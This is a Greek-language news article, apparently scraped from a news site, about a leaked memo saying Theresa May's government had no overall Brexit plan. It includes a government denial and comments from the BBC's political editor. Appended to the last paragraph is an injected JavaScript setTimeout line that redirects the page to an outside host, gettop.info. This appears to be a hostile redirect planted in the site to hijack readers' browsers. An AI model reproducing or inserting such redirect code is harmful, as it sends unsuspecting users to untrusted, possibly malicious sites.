«Δεν υπάρχει κανένα σχέδιο για Brexit»

0
3

 

Έπειτα από διαρροή εγγράφου αποκαλύπτεται ότι η βρετανική κυβέρνηση δεν έχει κάποιο συνολικό σχέδιο για έξοδο της χώρας από την ΕΕ και το υπουργικό συμβούλιο δεν αναμένεται να καταλήξει στην διαπραγματευτική στρατηγική που θα ακολουθήσει για τους επόμενους έξι μήνες εξαιτίας διαφωνιών στους κόλπους της κυβέρνησης της Τερέζα Μέι.

Στο έγγραφο που περιήλθε στην κατοχή της εφημερίδας Times και το οποίο είδε το BBC, αναφέρεται ότι το Whitehall επεξεργάζεται 500 μελέτες που σχετίζονται με το Brexit κι ενδεχομένως να χρειαστεί η πρόσληψη 30.000 επιπλέον δημοσίων υπαλλήλων.

Το υπόμνημα, το οποίο διέρρευσε και το οποίο είχε επεξεργαστεί σύμβουλος ο οποίος δεν κατονομάζεται, για την προεδρία της κυβέρνησης και έχει ημερομηνία 7 Νοεμβρίου, τιτλοφορείται «Ενημέρωση για το Brexit». Υπαινίσσεται ότι θα χρειαστεί ένα ακόμη εξάμηνο προτού η κυβέρνηση αποφασίσει ακριβώς τι θέλει να επιτύχει με την έξοδο της χώρας από την ΕΕ ή προτού συμφωνήσει στο ποιές θα είναι οι προτεραιότητες.

Επίσης ασκεί κριτική εις βάρος της Μέι, η οποία «καταλήγει σε αποφάσεις και λεπτομέρειες ώστε να διευθετεί η ίδια το ζήτημα»–μία προσέγγιση που περιγράφεται ως «απίθανο να αποδειχτεί βιώσιμη».

«Δεν πρόκειται για μία κυβερνητική έκθεση και δεν αναγνωρίζουμε τους ισχυρισμούς που περιέχει το υπόμνημα. Έχουμε επικεντρωθεί στο να προχωρήσουμε στο Brexit και να επιτύχουμε», δήλωσε κυβερνητικός εκπρόσωπος.

Ωστόσο, ο πολιτικός συντάκτης του BBC Κρις Μέισον, ο οποίος είδε το έγγραφο, δήλωσε ότι αυτό υποδηλώνει πόσο «σύνθετη, ανησυχητική και γεμάτη προκλήσεις θα είναι η διαδικασία της εξόδου». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here